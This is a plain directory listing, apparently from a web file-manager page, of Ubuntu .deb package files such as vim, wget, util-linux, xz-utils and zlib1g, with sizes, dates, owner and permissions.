update-manager-core_1%3a24.04.12_all.deb
11.32 KB
April 30 2025 3:38:36
root
0644
usb.ids_2024.03.18-1_all.deb
217.592 KB
March 19 2024 7:34:18
root
0644
usbutils_1%3a017-3build1_amd64.deb
82.539 KB
April 09 2024 3:24:19
root
0644
util-linux_2.37.2-4ubuntu3.4_amd64.deb
1.01 MB
April 10 2024 8:25:03
root
0644
util-linux_2.39.3-9ubuntu6.3_amd64.deb
1.08 MB
June 26 2025 6:40:15
root
0644
uuid-runtime_2.37.2-4ubuntu3.4_amd64.deb
31.295 KB
April 10 2024 8:25:03
root
0644
uuid-runtime_2.39.3-9ubuntu6.3_amd64.deb
32.277 KB
June 26 2025 6:40:15
root
0644
vim-common_2%3a8.2.3995-1ubuntu2.18_all.deb
79.59 KB
September 05 2024 10:35:06
root
0644
vim-common_2%3a9.1.0016-1ubuntu7.9_all.deb
376.961 KB
September 15 2025 10:19:37
root
0644
vim-runtime_2%3a8.2.3995-1ubuntu2.18_all.deb
6.51 MB
September 05 2024 10:35:05
root
0644
vim-runtime_2%3a9.1.0016-1ubuntu7.9_all.deb
6.94 MB
September 15 2025 10:19:31
root
0644
vim-tiny_2%3a8.2.3995-1ubuntu2.18_amd64.deb
691.607 KB
September 05 2024 10:35:06
root
0644
vim-tiny_2%3a9.1.0016-1ubuntu7.9_amd64.deb
784.59 KB
September 15 2025 10:19:39
root
0644
vim_2%3a8.2.3995-1ubuntu2.18_amd64.deb
1.65 MB
September 05 2024 10:35:06
root
0644
vim_2%3a9.1.0016-1ubuntu7.9_amd64.deb
1.79 MB
September 15 2025 10:19:40
root
0644
wget_1.21.2-2ubuntu1.1_amd64.deb
330.572 KB
June 26 2024 9:27:55
root
0644
wget_1.21.4-1ubuntu4.1_amd64.deb
325.809 KB
June 26 2024 9:28:08
root
0644
whiptail_0.52.24-2ubuntu2_amd64.deb
17.576 KB
April 01 2024 10:51:47
root
0644
wireless-regdb_2022.06.06-0ubuntu1~22.04.1_all.deb
10.029 KB
July 19 2022 10:29:12
root
0644
wireless-regdb_2024.10.07-0ubuntu1~22.04.1_all.deb
10.021 KB
February 07 2025 10:32:32
root
0644
wireless-regdb_2025.07.10-0ubuntu1~24.04.1_all.deb
7.326 KB
September 18 2025 5:57:22
root
0644
x11-common_1%3a7.7+23ubuntu3_all.deb
21.238 KB
April 09 2024 2:39:32
root
0644
xauth_1%3a1.1.2-1build1_amd64.deb
24.994 KB
April 09 2024 2:39:30
root
0644
xdg-user-dirs_0.18-1build1_amd64.deb
17.951 KB
April 09 2024 2:39:30
root
0644
xfonts-encodings_1%3a1.0.5-0ubuntu2_all.deb
564.543 KB
March 24 2022 5:09:07
root
0644
xfonts-utils_1%3a7.7+6build3_amd64.deb
92.225 KB
April 09 2024 2:39:31
root
0644
xkb-data_2.41-2ubuntu1.1_all.deb
388.016 KB
July 10 2024 6:27:35
root
0644
xml-core_0.19_all.deb
19.863 KB
December 14 2023 8:03:00
root
0644
xxd_2%3a8.2.3995-1ubuntu2.18_amd64.deb
51.787 KB
September 05 2024 10:35:06
root
0644
xxd_2%3a9.1.0016-1ubuntu7.9_amd64.deb
62.322 KB
September 15 2025 10:19:38
root
0644
xz-utils_5.6.1+really5.4.5-1ubuntu0.2_amd64.deb
261.15 KB
April 04 2025 1:31:04
root
0644
zlib1g_1%3a1.2.11.dfsg-2ubuntu9.2_amd64.deb
57.037 KB
October 18 2022 2:33:28
root
0644
zlib1g_1%3a1.3.dfsg-3.1ubuntu2.1_amd64.deb
61.377 KB
August 09 2024 6:49:11
root
0644
zstd_1.5.5+dfsg2-2build1.1_amd64.deb
628.926 KB
August 09 2024 6:49:12
root
0644
2017 © MaVieta | D704T team